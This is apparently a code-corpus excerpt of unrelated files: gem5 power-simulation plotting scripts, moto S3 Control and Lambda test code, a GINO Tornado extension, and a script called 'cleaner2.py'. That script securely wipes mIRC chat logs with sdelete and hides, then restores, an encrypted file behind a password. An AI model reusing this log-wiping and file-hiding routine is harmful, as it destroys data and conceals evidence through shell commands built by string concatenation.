file_dir = HOME+ '/plot/5-4-pdn_test2.png'
plt.savefig(file_dir, dpi=300)
print(file_dir)
print('throttle min power: ', min(voltage_t))
```
#### File: python/jimmy_plot/get_speedup.py
```python
from file_read_backwards import FileReadBackwards
TEST_LIST_spec=[
"429.mcf",
"433.milc",
"435.gromacs",
"436.cactusADM",
"437.leslie3d",
"444.namd",
"445.gobmk",
"453.povray",
"454.calculix",
"456.hmmer",
"458.sjeng",
"459.GemsFDTD",
"462.libquantum",
"464.h264ref",
# "470.lbm",
"471.omnetpp",
"473.astar",
"481.wrf", \
"482.sphinx3", \
]
fdir = "/home/jimmyjz2/output_9_16_harvard_inf-table_lt=[0:50]_sig=64/gem5_out/"
post_fix = "_150_1000000_DESKTOP_HarvardPowerPredictorMitigation/stats.txt"
# fdir2 = "/home/jimmyjz2/output_9_15_harvard_inf-table_lt=[0:50]_sig=64/gem5_out/"
# post_fix2 = "_100_1000000_DESKTOP_HarvardPowerPredictor/stats.txt"
def calc_speedup(data_h,data_fp):
num_preds = []
num_ves = []
num_cycles = []
def get_val(line):
str_num = line.split()[1]
return int(str_num.split(".")[0])
for idx, test in enumerate(TEST_LIST_spec):
path = fdir + test + post_fix
with FileReadBackwards(path, encoding="utf-8") as frb:
for line in frb:
if "system.cpu.powerPred.hit_rate::total" in line:
num_ves.append(get_val(line))
if "system.cpu.numCycles" in line:
num_cycles.append(get_val(line))
if "system.cpu.powerPred.total_actions" in line:
num_preds.append(get_val(line))
if (len(num_ves)==idx+1 and len(num_cycles)==idx+1 and len(num_preds)==idx+1):
num_ves[-1] = num_cycles[-1]/789
break
num_preds = [(data_h[i]+data_fp[i])*1000 for i in range(len(num_ves))]
BASELINE_CLK = 3.3E9
TEST_CLK = 4E9
ROLL_BACK_PENALTY = 500
THROTTLE_DUR = 70
speedup=0
for idx, test in enumerate(TEST_LIST_spec):
# print(test)
total_ve = num_ves[idx]
total_preds = num_preds[idx]
num_hits = int(data_h[idx]*total_ve)
num_misses = int((1-data_h[idx])*total_ve)
num_fps = int(data_fp[idx]*total_preds)
original_time = 150000000/BASELINE_CLK
new_time = 150000000/TEST_CLK
#false negatives
miss_time= ROLL_BACK_PENALTY*(1/TEST_CLK)*num_misses
#false positives
hit_time= num_hits*THROTTLE_DUR*(1/TEST_CLK/2)
#hits
fp_time= num_fps*THROTTLE_DUR*(1/TEST_CLK/2)
new_time += miss_time + fp_time + hit_time
# print(new_time/original_time)
# print(num_cycles[idx]/(total_ve+1))
# print(data_h[idx], data_fp[idx])
# print(num_misses, num_fps, num_hits)
# print(round(miss_time/new_time,2), round(fp_time/new_time,2), round(hit_time/new_time,2))
speedup += 100*(1 - new_time/original_time)
# print()
print(speedup / len(TEST_LIST_spec))
def calc_speedup_oracle(voltages, ve_cycles, tests):
BASELINE_CLK = 3.3E9
TEST_CLK = 4E9
ROLL_BACK_PENALTY = 500
THROTTLE_DUR = 70
speedup=0
for idx, test in enumerate(tests):
# print(test)
total_ve = len(ve_cycles)
total_preds = len(ve_cycles)
num_hits = len(ve_cycles)
num_misses = 0
num_fps = 0
original_time = len(voltages)/BASELINE_CLK
new_time = len(voltages)/TEST_CLK
#false negatives
miss_time= ROLL_BACK_PENALTY*(1/TEST_CLK)*num_misses
#false positives
hit_time= num_hits*THROTTLE_DUR*(1/TEST_CLK/2)
#hits
fp_time= num_fps*THROTTLE_DUR*(1/TEST_CLK/2)
new_time += miss_time + fp_time + hit_time
# print(new_time/original_time)
# print(num_cycles[idx]/(total_ve+1))
# print(data_h[idx], data_fp[idx])
# print(num_misses, num_fps, num_hits)
# print(round(miss_time/new_time,2), round(fp_time/new_time,2), round(hit_time/new_time,2))
speedup += 100*(1 - new_time/original_time)
avg_speedup = print(speedup / len(TEST_LIST_spec))
return avg_speedup
#[40,0]
#1.344 thres, 1.4vdc harvard processor
data_h = [0.97, 0.93, 0.95, 0.65, 0.94, 0.55, 0.94, 0.67, 0.93, 0.82, 0.95, 0.35, 0.99, 0.950, 0.96, 0.32, 0.35, 0.98, 0.75]
data_fp =[0.14, 0.12, 0.08, 0.21, 0.09, 0.36, 0.03, 0.43, 0.06, 0.07, 0.04, 0.43, 0.04, 0.080, 0.10, 0.22, 0.43, 0.10, 0.20]
calc_speedup(data_h,data_fp)
#1.344 jimmy predictor
data_h = [0.97, 0.94, 0.95, 0.67, 0.95, 0.72, 0.95, 0.75, 0.93, 0.83, 0.94, 0.44, 0.99, 0.960, 0.96, 0.39, 0.50, 0.98, 0.78]
data_fp =[0.13, 0.14, 0.08, 0.15, 0.08, 0.30, 0.023,0.33, 0.05, 0.07, 0.04, 0.30, 0.04, 0.085, 0.10, 0.18, 0.37, 0.10, 0.20]
calc_speedup(data_h,data_fp)
#[40,16]
#1.344 thres, 1.4vdc harvard processor
data_h = [0.94, 0.88, 0.84, 0.58, 0.91, 0.50, 0.82, 0.62, 0.90, 0.76, 0.92, 0.31, 0.93, 0.87, 0.75, 0.30, 0.31, 0.81, 0.70]
data_fp =[0.21, 0.31, 0.12, 0.27, 0.13, 0.57, 0.12, 0.47, 0.16, 0.17, 0.12, 0.56, 0.044,0.12, 0.18, 0.27, 0.51, 0.18, 0.27]
calc_speedup(data_h,data_fp)
#1.344 jimmy predictor
data_h = [0.96, 0.92, 0.94, 0.65, 0.88, 0.68, 0.90, 0.74, 0.91, 0.79, 0.94, 0.38, 0.98, 0.83, 0.86, 0.37, 0.43, 0.96, 0.73]
data_fp =[0.14, 0.23, 0.09, 0.17, 0.13, 0.36, 0.04, 0.35, 0.05, 0.13, 0.05, 0.32, 0.04, 0.095,0.14, 0.23, 0.43, 0.11, 0.26]
calc_speedup(data_h,data_fp)
calc_speedup([1]*len(data_h), [1]*len(data_fp))
```
#### File: python/jimmy_plot/playground3.py
```python
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import os
import math
from cython.sim_pdn import get_volt_wrapper
TEST_LIST_spec=[
"429.mcf",
"433.milc",
"435.gromacs",
"436.cactusADM",
"437.leslie3d",
"444.namd",
"445.gobmk",
"453.povray",
"454.calculix",
"456.hmmer",
"458.sjeng",
"459.GemsFDTD",
"462.libquantum",
"464.h264ref",
# "470.lbm",
"471.omnetpp",
"473.astar",
"481.wrf", \
"482.sphinx3", \
]
def get_data(output_dir, file_name, _dtype):
HOME = os.environ['HOME']
file_path = os.path.join(HOME,output_dir, file_name)
with open(file_path, "rb") as binaryfile :
myArr = bytearray(binaryfile.read())
data = np.frombuffer(myArr, dtype=_dtype)
return data
#PARAMS
SUBPLOT_LEN = 1000
MAX_SUBPLOTS = 3
OFFSET = 0
FIGWIDTH = 30
def plot(data, ve_cycles, name, labels=None):
num_datapoints = len(data[0])
ve_cycles = list(ve_cycles)
HOME = os.environ['HOME']
DATE = "9-7"
plot_path = HOME+'/plot/' + DATE +'_'+name + '.jpg'
start = OFFSET
stop = OFFSET + SUBPLOT_LEN
subplot_indices = []
while stop < num_datapoints:
subplot_indices.append((start,stop))
start += SUBPLOT_LEN
stop += SUBPLOT_LEN
#add the remainder data
if stop > num_datapoints:
subplot_indices.append((start,num_datapoints-1))
if len(subplot_indices) > MAX_SUBPLOTS:
subplot_indices = subplot_indices[:MAX_SUBPLOTS]
print("Plotting cycles {} to {}!".format(subplot_indices[0][0], subplot_indices[-1][1]))
print("{} number of plots!".format(len(subplot_indices)))
fig, axs = plt.subplots(len(subplot_indices),
figsize=(FIGWIDTH,len(subplot_indices)*2))
def plot_subplot(start_idx, stop_idx, data, ax_idx, highlight_cycles):
y = range(start_idx,stop_idx)
axs[ax_idx].margins(x=0)
for idx, series in enumerate(data):
x = series[start_idx:stop_idx]
if labels:
axs[ax_idx].plot(y, x, linewidth=1, label=labels[idx])
else:
axs[ax_idx].plot(y, x, linewidth=1)
axs[ax_idx].xaxis.set_major_locator(plt.MaxNLocator(20))
# axs[ax_idx].set_ylim([1.3,1.4])
for hl in highlight_cycles:
axs[ax_idx].axvspan(hl, hl+1, color='red', alpha=0.5)
if labels:
axs[ax_idx].legend()
if len(ve_cycles)>0:
ve_cycles.sort()
while ve_cycles[0] < subplot_indices[0][0]:
ve_cycles.pop(0)
for n in range(0,len(subplot_indices)):
x_start = subplot_indices[n][0]
x_end = subplot_indices[n][1]
subplot_ve_cycles = []
if len(ve_cycles)>0:
while ve_cycles[0] < x_end:
subplot_ve_cycles.append(ve_cycles.pop(0))
print("Plotting subplot: {}/{}".format(n+1,len(subplot_indices)))
plot_subplot(x_start, x_end, data, n, subplot_ve_cycles)
print("Saving to: {}".format(plot_path))
plt.savefig(plot_path, dpi=90, bbox_inches='tight', format='jpg')
def get_static_pwr(power):
start = 1000
end = 2000
return np.average(np.sort(power)[start:end])
def print_power(voltage, power, ve_cycles):
print("{} cycles simulated".format(len(power)))
print("Total Emergencies: {}".format(len(ve_cycles)))
if (len(ve_cycles) > 1):
print("Cycles/VE: {}".format(len(power)/len(ve_cycles)))
static_pwr = get_static_pwr(power)
avg_pwr = round(np.sum(power)/len(power),4)
avg_dyn_pwr = round((np.sum(power) - static_pwr*len(power))/len(power),4)
print("Avg Power: {}, Avg Dyn power {}, Static Pwr {}".format(avg_pwr, avg_dyn_pwr, static_pwr))
print("Avg Voltage: {}".format(np.sum(voltage)/len(voltage)))
bin_width = int(len(voltage)/5)
bins = [0]*math.ceil(len(voltage)/bin_width)
for i in ve_cycles:
idx = math.floor(i/bin_width)
bins[idx] += 1
for idx,val in enumerate(bins):
start_cycle = idx*bin_width
end_cycle = min((idx+1)*bin_width,len(voltage))-1
print("cycles {}:{}- {} emergencies".format(start_cycle,end_cycle,val))
print()
def diff(orig, new):
perc_diff = np.divide(new/orig)
perc_diff[ np.where( perc_diff > 0.01 ) ]
print(perc_diff.shape())
def get_voltage(full_dir, dtype,
THRES,L,C,R,VDC,CLK,
clk_offset=0):
if not os.path.isfile(full_dir+'/power.bin'):
print("Skipping, not found {}".format(full_dir+'/power.bin'))
return None
power = get_data(full_dir, 'power.bin', dtype)
speedup_clk = CLK+clk_offset
if clk_offset != 0:
speedup_clk = CLK+clk_offset
static_pwr_slope = 0.07850192802056581 #watts/ghz
# dyn_pwr_slope = 0.33784768637532137
dyn_pwr_scale = 0.99192848464
static_pwr = get_static_pwr(power)
dyn_power_series = power - static_pwr
static_power_series = np.subtract(power, dyn_power_series)
print("STATIC PWR offset: {} + {} = {}".format(
np.average(static_power_series),
static_pwr_slope*(clk_offset/1E9),
np.average(static_power_series + static_pwr_slope*(clk_offset/1E9))))
print("DYNMIC PWR offset: {}*{} = {}".format(
np.average(dyn_power_series),
(speedup_clk/CLK)*dyn_pwr_scale,
np.average(dyn_power_series * (speedup_clk/CLK)*dyn_pwr_scale)))
print(speedup_clk/CLK)
dyn_power_series = dyn_power_series * (speedup_clk/CLK)*dyn_pwr_scale
static_power_series = static_power_series + static_pwr_slope*(clk_offset/1E9)
power = np.add(static_power_series, dyn_power_series)
# print("2. getting current")
curr = np.true_divide(power, VDC)
curr = curr.astype(np.double)
# print('3. getting voltage...')
[voltage,ve_cycle] = get_volt_wrapper(curr,THRES,L,C,R,VDC,speedup_clk)
print_power(voltage, power, ve_cycle)
return (power,voltage,ve_cycle)
def run(print_stats=False):
VDC = 1.4
THRES = 1.36
L = 20e-12
C = 1.32e-6
R = 3.2e-3
CLKS = [4E9, 2E9]
HOME = os.environ['HOME']
output_dirs = ["output_10_8/gem5_out"]
tests = ["482.sphinx3"]
post_fixes = ["_5_1000000_DESKTOP_HarvardPowerPredictor_400000000",
"_5_1000000_DESKTOP_HarvardPowerPredictor_200000000"]
dtype = np.single
cnt = 0
power_data = []
voltage_data = []
ve_cycles_data = []
power_datas_dirs = []
for out_dir in output_dirs:
for tn in tests:
for pf in post_fixes:
cnt+=1
power_datas_dirs.append(os.path.join(HOME, out_dir, tn+pf))
for i, full_dir in enumerate(power_datas_dirs):
res = get_voltage(full_dir, dtype,
THRES,L,C,R,VDC,CLKS[i])
if res == None:
continue
power_data.append(res[0])
voltage_data.append(res[1])
ve_cycles_data.append(res[2])
(power, voltage, ve_cycles) = res
res = get_voltage(power_datas_dirs[-1], dtype,
THRES,L,C,R,VDC,2E9, clk_offset=2E9)
power_data.append(res[0])
voltage_data.append(res[1])
ve_cycles_data.append(res[2])
power_datas_dirs.append("recreation 2ghz->4ghz")
diff(power[0],power[-1])
plot(power_data, [], '10_7_power_'+tn+str(cnt), labels=power_datas_dirs)
if __name__ == "__main__":
run(True)
```
#### File: python/jimmy_plot/prediction_test.py
```python
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import math
import struct
import os
from functools import reduce
import time
import sim_pdn
from collections import defaultdict
import ve_dist_sim
import predictor_sim
import test
def get_data(test_name,file_name,_dtype):
output_dir = 'output_4_9_vedist/gem5_out'
HOME = os.environ['HOME']
file_path = os.path.join(HOME,output_dir)
file_path = os.path.join(file_path,test_name)
file_path = os.path.join(file_path,file_name)
print(file_path)
print('loading...')
with open(file_path, "rb") as binaryfile :
myArr = bytearray(binaryfile.read())
data = np.frombuffer(myArr, dtype=_dtype)
return data
def run():
VDC = 1.4
THRES = 1.3
L = 20e-12
C = 1.32e-06
R = 3.2e-3
CLK = 4E9
tn = '459.GemsFDTD_130_1000000_DESKTOP_HarvardPowerPredictorMitigation'
pc_data = get_data(tn, 'taken_branch.bin',np.uint64)
power = get_data(tn, 'power.bin', np.double)
curr = np.true_divide(power, VDC)
print('1. getting voltage...')
[voltage,ve_cycle] = sim_pdn.get_volt_wrapper(curr,THRES,L,C,R,VDC,CLK)
print(' done!')
print('2. running predictor...')
(hr,fp) = predictor_sim.run_prediction_wrapper(pc_data, ve_cycle, voltage)
print(' done!')
print("hit rate: ", hr)
print("false pos rate:", fp)
if __name__ == "__main__":
run()
``` |
{
"source": "JimNero009/moto",
"score": 2
} |
#### File: moto/s3control/responses.py
```python
import json
import xmltodict
from moto.core.responses import BaseResponse
from moto.core.utils import amzn_request_id
from moto.s3.exceptions import S3ClientError
from moto.s3.responses import S3_PUBLIC_ACCESS_BLOCK_CONFIGURATION
from .models import s3control_backend
class S3ControlResponse(BaseResponse):
@classmethod
def public_access_block(cls, request, full_url, headers):
response_instance = S3ControlResponse()
try:
return response_instance._public_access_block(request, headers)
except S3ClientError as err:
return err.code, {}, err.description
@amzn_request_id
def _public_access_block(self, request, headers):
if request.method == "GET":
return self.get_public_access_block(headers)
elif request.method == "PUT":
return self.put_public_access_block(request, headers)
elif request.method == "DELETE":
return self.delete_public_access_block(headers)
def get_public_access_block(self, headers):
account_id = headers["x-amz-account-id"]
public_block_config = s3control_backend.get_public_access_block(
account_id=account_id,
)
template = self.response_template(S3_PUBLIC_ACCESS_BLOCK_CONFIGURATION)
return 200, {}, template.render(public_block_config=public_block_config)
def put_public_access_block(self, request, headers):
account_id = headers["x-amz-account-id"]
pab_config = self._parse_pab_config(request.body)
s3control_backend.put_public_access_block(
account_id, pab_config["PublicAccessBlockConfiguration"]
)
return 201, {}, json.dumps({})
def delete_public_access_block(self, headers):
account_id = headers["x-amz-account-id"]
s3control_backend.delete_public_access_block(account_id=account_id,)
return 204, {}, json.dumps({})
def _parse_pab_config(self, body):
parsed_xml = xmltodict.parse(body)
parsed_xml["PublicAccessBlockConfiguration"].pop("@xmlns", None)
return parsed_xml
```
#### File: tests/test_awslambda/utilities.py
```python
import boto3
import io
import pytest
import time
import zipfile
from botocore.exceptions import ClientError
from moto import settings, mock_iam
from uuid import uuid4
_lambda_region = "us-west-2"
def _process_lambda(func_str):
zip_output = io.BytesIO()
zip_file = zipfile.ZipFile(zip_output, "w", zipfile.ZIP_DEFLATED)
zip_file.writestr("lambda_function.py", func_str)
zip_file.close()
zip_output.seek(0)
return zip_output.read()
def get_test_zip_file1():
pfunc = """
def lambda_handler(event, context):
print("custom log event")
return event
"""
return _process_lambda(pfunc)
def get_test_zip_file2():
func_str = """
import boto3
def lambda_handler(event, context):
ec2 = boto3.resource('ec2', region_name='us-west-2', endpoint_url='http://{base_url}')
volume_id = event.get('volume_id')
vol = ec2.Volume(volume_id)
return {{'id': vol.id, 'state': vol.state, 'size': vol.size}}
""".format(
base_url="motoserver:5000"
if settings.TEST_SERVER_MODE
else "ec2.us-west-2.amazonaws.com"
)
return _process_lambda(func_str)
def get_test_zip_file3():
pfunc = """
def lambda_handler(event, context):
print("Nr_of_records("+str(len(event['Records']))+")")
print("get_test_zip_file3 success")
return event
"""
return _process_lambda(pfunc)
def get_test_zip_file_error():
pfunc = """
def lambda_handler(event, context):
raise Exception('I failed!')
"""
return _process_lambda(pfunc)
def get_test_zip_largeresponse():
pfunc = """
def lambda_handler(event, context):
x = ["xxx" for x in range(10 ** 6)]
return {"statusCode": 200, "body": x}
"""
return _process_lambda(pfunc)
def get_zip_with_multiple_files():
pfunc = """
from utilities import util_function
def lambda_handler(event, context):
x = util_function()
event["msg"] = event["msg"] + x
return event
"""
ufunc = """
def util_function():
return "stuff"
"""
zip_output = io.BytesIO()
zip_file = zipfile.ZipFile(zip_output, "a", zipfile.ZIP_DEFLATED)
zip_file.writestr("lambda_function.py", pfunc)
zip_file.close()
zip_file = zipfile.ZipFile(zip_output, "a", zipfile.ZIP_DEFLATED)
zip_file.writestr("utilities.py", ufunc)
zip_file.close()
zip_output.seek(0)
return zip_output.read()
def create_invalid_lambda(role):
conn = boto3.client("lambda", _lambda_region)
zip_content = get_test_zip_file1()
function_name = str(uuid4())[0:6]
with pytest.raises(ClientError) as err:
conn.create_function(
FunctionName=function_name,
Runtime="python2.7",
Role=role,
Handler="lambda_function.handler",
Code={"ZipFile": zip_content},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
return err
def get_role_name():
with mock_iam():
iam = boto3.client("iam", region_name=_lambda_region)
try:
return iam.get_role(RoleName="my-role")["Role"]["Arn"]
except ClientError:
return iam.create_role(
RoleName="my-role",
AssumeRolePolicyDocument="some policy",
Path="/my-path/",
)["Role"]["Arn"]
def wait_for_log_msg(expected_msg, log_group):
logs_conn = boto3.client("logs", region_name="us-east-1")
received_messages = []
start = time.time()
while (time.time() - start) < 30:
try:
result = logs_conn.describe_log_streams(logGroupName=log_group)
log_streams = result.get("logStreams")
except ClientError:
log_streams = None # LogGroupName does not yet exist
if not log_streams:
time.sleep(1)
continue
for log_stream in log_streams:
result = logs_conn.get_log_events(
logGroupName=log_group, logStreamName=log_stream["logStreamName"],
)
received_messages.extend(
[event["message"] for event in result.get("events")]
)
for line in received_messages:
if expected_msg in line:
return True, set(received_messages)
time.sleep(1)
return False, set(received_messages)
```
#### File: tests/test_rds/test_rds.py
```python
import boto3
import sure # noqa # pylint: disable=unused-import
import pytest
from moto import mock_rds
def test_deprecation_warning():
with pytest.warns(None) as record:
mock_rds()
str(record[0].message).should.contain(
"Module mock_rds has been deprecated, and will be repurposed in a later release"
)
@mock_rds
def test_get_databases_paginated():
conn = boto3.client("rds", region_name="us-west-2")
for i in range(51):
conn.create_db_instance(
AllocatedStorage=5,
Port=5432,
DBInstanceIdentifier="rds%d" % i,
DBInstanceClass="db.t1.micro",
Engine="postgres",
)
resp = conn.describe_db_instances()
resp["DBInstances"].should.have.length_of(50)
resp["Marker"].should.equal(resp["DBInstances"][-1]["DBInstanceIdentifier"])
resp2 = conn.describe_db_instances(Marker=resp["Marker"])
resp2["DBInstances"].should.have.length_of(1)
``` |
{
"source": "jimni/enrichment",
"score": 3
} |
#### File: jimni/enrichment/main.py
```python
from GenesLists import *
import argparse
import csv
# preset paths are used if no command line parameters are specified
metabolicListDirectory = '/Users/jim/Desktop/enrichment_maps_pathways/kegg_some'
completeListPath = '/Users/jim/Desktop/enrichment_maps_pathways/our_expressed.csv'
targetListPath = '/Users/jim/Desktop/enrichment_maps_pathways/target_68'
outFileName = 'result.csv'
conversionMapPath = 'resources/gene_id_name_map.csv'
# additional config
csvHeaderRow = [
"metabolic_name",
"complete_count",
"metabolic_clean_count",
"target_count",
"intersection_count",
"p_val_hypergeometric_score",
"gene_names"
]
def main():
# command line arguments parsing
parser = argparse.ArgumentParser(description='Specify command line parameters for metabolic, complete and target '
'gene id lists or preset correct paths in `main.py`. From each file '
'only the strings with integer numbers are used.')
parser.add_argument("-metabolics", "-m", dest="metabolicListDirectory",
help="path to folder with metabolic lists", default=metabolicListDirectory,
metavar="folder_path")
parser.add_argument("-complete", "-c", dest="completeListPath",
help="path to file with complete list", default=completeListPath, metavar="file_path")
parser.add_argument("-target", "-t", dest="targetListPath",
help="path to file with target list", default=targetListPath, metavar="file_path")
parser.add_argument("-out", "-o", dest="outFilePath",
help="path to file with result, defaults to `%%target_list_name%%_"+outFileName+"` "
"in target list folder", metavar="file_path")
args = parser.parse_args()
args.outFilePath = args.outFilePath or os.path.splitext(args.targetListPath)[0]+'_'+outFileName
# todo: make convert_ids_to_names optional
# main body
complete = GeneList(args.completeListPath)
target = GeneList(args.targetListPath)
result = csv.writer(open(args.outFilePath, 'w'))
result.writerow(csvHeaderRow)
metabolic_file_list = [
os.path.join(args.metabolicListDirectory, fileName) for fileName in next(os.walk(args.metabolicListDirectory))[2]
]
metabolics = []
for fileName in metabolic_file_list:
metabolics.append(MetabolicList(fileName))
for metabolic in metabolics:
metabolic.intersect_with(complete)
metabolic.intersect_with(target)
metabolic.compute_hypergeometric_score(complete, target)
# metabolic.show(show_gene_ids=False)
metabolic.convert_ids_to_names(conversionMapPath, delimiter_char=';')
result.writerow([
metabolic.name,
complete.initialLength,
metabolic.afterIntersectionLength[0],
target.initialLength,
metabolic.afterIntersectionLength[-1],
"%.20f" % metabolic.hypergeometricScore,
' | '.join(metabolic.geneNames)
])
if __name__ == "__main__":
main()
``` |
{
"source": "jimni/gtf-to-csv-converter",
"score": 3
} |
#### File: jimni/gtf-to-csv-converter/gtf_to_csv.py
```python
from GTF import dataframe
import argparse
import os.path
def is_valid_file(argparser, arg):
if not os.path.exists(arg):
argparser.error("The file %s does not exist!" % arg)
else:
return arg
parser = argparse.ArgumentParser(description='Input GTF file and optional parameters')
parser.add_argument("-i", dest="infile", required=True,
help="input gtf file", metavar="INFILE",
type=lambda x: is_valid_file(parser, x))
parser.add_argument("-o", dest="outfile",
help="output csv file, defaults to `input file name`.csv", metavar="OUTFILE")
parser.add_argument("-columns", "-c", dest="columns", nargs="+",
help="list of columns to write to csv, e. g. `-columns column1 column2 column3`", metavar="COLUMN")
args = parser.parse_args()
args.outfile = args.outfile or os.path.splitext(args.infile)[0]+'.csv'
df = dataframe(args.infile)
print(" creating csv...")
df.to_csv(args.outfile, index=False, columns=args.columns)
print("SUCCESS: %s created." % args.outfile)
``` |
{
"source": "jim-nnamdi/Loanapplicant-salaryPredictor",
"score": 3
} |
#### File: Loanapplicant-salaryPredictor/loanpred_tests/PredTest.py
```python
from app import app
import unittest
# Initialize the class and then specify
# the Tear up and down method which would
# Actuate the tests based on core_demand
class PredictionTest(unittest.TestCase):
# Define the setup class to initialize the
# App class as a test Object during testing
def setUp(self):
self.app = app.test_client()
self.app.testing = True
# Define the teardown class to remove the
# App class as a test Object during testing
def tearDown(self):
pass
# Test that the homepage opens correctly on
# Accessing the Prediction page via_urls
def test_homepage_opens_correctly(self):
response = self.app.get('/')
self.assertEquals(response.status_code, 200)
# Test that the result page is opened correctly
# And that it has a POST request sent to it
def test_prediction_processes_post(self):
response = self.app.get('/result')
self.assertEquals(response.status_code, 200)
self.assertIsNot(response.status_code, 401)
# Test that if the results page returns empty
# results which is the data then the page should
# throw an exception error
def test_empty_dataset_is_not_processed(self):
data = { }
response = self.app.get('/result')
self.assertEquals(response.status_code, 403)
self.assertIsNone(response.data)
``` |
{
"source": "JimNtexas/cleaner",
"score": 3
} |
#### File: JimNtexas/cleaner/cleaner2.py
```python
import shutil
import os
import string
import argparse
from simplecrypt import encrypt, decrypt
#from Crypto.Hash import HMAC
#from Crypto.Hash import SHA256
#from Crypto.Cipher import AES
import binascii
import sys
import ntpath
import hashlib
global dbg, pwhash, src
src = ""
dbg = False
pwhash = "not a hash"
def dbg_print(txt):
if(dbg):
print(txt)
def check_pw(plain):
hash_object = hashlib.sha1(plain.encode('utf-8'))
hashed = hash_object.hexdigest()
dbg_print(hashed)
global pwhash
pwhash = hashed
return pwhash
def encryptfile(infile, outfile):
print('encryt this file' + infile);
fread = open(infile, mode='rb') #read the encrypted file
bytes = fread.read()
ciphertext = encrypt(pwhash, bytes) # decrypt returns bytes
fwrite = open(outfile, mode='wb')
fwrite.write(ciphertext)
return
def decryptfile(infile, outfile):
f = open(infile, mode='rb') #read the encrypted file
bytes = f.read()
plaintext = decrypt(pwhash, bytes)
f.close()
fw = open(outfile, 'wb')
fw.write(plaintext)
fw.close()
return
def path_leaf(path):
head, tail = ntpath.split(path)
return tail or ntpath.basename(head)
def getsrc():
global src
if (src == ""):
f = open('mi.bin','rb');
bytes = f.read()
src = decrypt(pwhash, bytes).decode('utf-8')
f.close()
return src
def clearDir(dirPath) :
file_path = ''
for the_file in os.listdir(dirPath):
file_path = os.path.join(dirPath, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
#elif os.path.isdir(file_path): shutil.rmtree(file_path)
except Exception, e:
print e
return
def rmfile(tgt):
print('removing ' + tgt)
try:
os.remove(tgt)
except OSError:
print('rmfile error')
pass
#Main
parser = argparse.ArgumentParser()
parser.add_argument("cmd", help="hide or restore")
parser.add_argument("pw", nargs='?', default='', help="password")
parser.add_argument("--verbose", nargs='?', default=True, help="True or False")
args = parser.parse_args()
if(args.verbose is None):
dbg = True
print ('dbg:' + str(dbg))
def sdelete(tgt):
print('sdeleting ' + tgt)
os.system('sdelete -p 3 ' + tgt)
option = args.cmd
password = args.pw
while len(password) == 0:
password = raw_input('Enter password:')
if args.cmd not in ('hide', 'restore'):
print('hide or restore the file?')
exit(1)
if not check_pw(password) :
print("unable")
exit(1)
getsrc()
filename = ntpath.basename(src);
dbg_print('mode: ' + option)
if option == 'hide':
try:
# clearDir('C:/Users/Jim/AppData/Roaming/mIRC/channels')
# clearDir('C:/Users/Jim/AppData/Roaming/mIRC/logs')
sdelete('C:/Users/Jim/AppData/Roaming/mIRC/channels *.*')
sdelete('C:/Users/Jim/AppData/Roaming/mIRC/logs *.*')
dbg_print('delete:' + os.getcwd())
rmfile(filename) #delete any local copy
print('copy:' + src)
shutil.copyfile(src, os.getcwd()+'/'+filename)
print('copied ' + src)
rmfile(src) #remove the src file
except IOError as err:
print("I/O error: {0}".format(err))
exit(1)
print('hide succeeded')
if option == 'restore':
f = open('mdata.bin', mode='rb') #read the encrypted file
bytes = f.read()
plaintext = decrypt(pwhash, bytes) # decrypt returns bytes
f.close()
# the decrypted plaintext is bytes
fw = open('temp.txt', 'wb')
fw.write(plaintext)
fw.close()
dbg_print('deleting:' + getsrc())
rmfile( getsrc() ) #delete the original file
dbg_print( 'moving to ' + getsrc() )
shutil.move('temp.txt', getsrc())
dbg_print('Starting target')
os.startfile('C:\Users\Jim\ProgramFiles\mIRC\mirc.exe')
print("program exit")
``` |
{
"source": "jim-obrien-orig/gino",
"score": 2
} |
#### File: gino/ext/tornado.py
```python
import asyncio
import typing
import tornado
import tornado.ioloop
import tornado.iostream
import tornado.log
import tornado.platform.asyncio
import tornado.web
from sqlalchemy.engine.url import URL
from ..api import Gino as _Gino, GinoExecutor as _Executor
from ..engine import GinoConnection as _Connection, GinoEngine as _Engine
from ..strategies import GinoStrategy
if tornado.version_info[0] < 5:
raise Exception('Only Tornado 5 or later is supported')
class TornadoModelMixin:
@classmethod
async def get_or_404(cls, *args, **kwargs):
# noinspection PyUnresolvedReferences
rv = await cls.get(*args, **kwargs)
if rv is None:
raise tornado.web.HTTPError(404)
return rv
class GinoExecutor(_Executor):
async def first_or_404(self, *args, **kwargs):
rv = await self.first(*args, **kwargs)
if rv is None:
raise tornado.web.HTTPError(404)
return rv
class GinoConnection(_Connection):
async def first_or_404(self, *args, **kwargs):
rv = await self.first(*args, **kwargs)
if rv is None:
raise tornado.web.HTTPError(404)
return rv
class GinoEngine(_Engine):
connection_cls = GinoConnection
async def first_or_404(self, *args, **kwargs):
rv = await self.first(*args, **kwargs)
if rv is None:
raise tornado.web.HTTPError(404)
return rv
class TornadoStrategy(GinoStrategy):
name = 'tornado'
engine_cls = GinoEngine
TornadoStrategy()
class Gino(_Gino):
"""
Base class for GINO database.
Using this class as a metadata for your database adds an additional
``get_or_404()`` method to all of your table classes.
"""
model_base_classes = _Gino.model_base_classes + (TornadoModelMixin,)
query_executor = GinoExecutor
if typing.TYPE_CHECKING:
# Typehints to enable autocompletion on all Gino.Model-derived classes
from ..crud import CRUDModel as __CRUDModel
from ..declarative import ModelType as __ModelType
class Model(__CRUDModel, TornadoModelMixin, metaclass=__ModelType):
...
async def first_or_404(self, *args, **kwargs):
rv = await self.first(*args, **kwargs)
if rv is None:
raise tornado.web.HTTPError(404)
return rv
async def set_bind(self, bind, loop=None, **kwargs):
kwargs.setdefault('strategy', 'tornado')
return await super().set_bind(bind, loop=loop, **kwargs)
async def init_app(self, app, *, loop=None, dsn='', driver='asyncpg',
host='localhost', port=5432,
user='postgres', password='', database='postgres',
echo=False, pool_min_size=5, pool_max_size=10,
ssl=None, **kwargs):
"""
Initialize database
:param app: tornado.web.Application
:param loop: User-defined event loop. If not defined, tornado default
loop will be used.
:param driver: the database driver, default is ``asyncpg``.
:param host: database server host, default is ``localhost``.
:param port: database server port, default is ``5432``.
:param user: database server user, default is ``postgres``.
:param password: database server password, default is empty.
:param database: database name, default is ``postgres``.
:param dsn: a SQLAlchemy database URL to create the engine, its
existence will replace all previous connect arguments.
:param echo: enable SQLAlchemy echo mode.
:param pool_min_size: the initial number of connections of the db
pool, default is ``5``.
:param pool_max_size: the maximum number of connections in the db
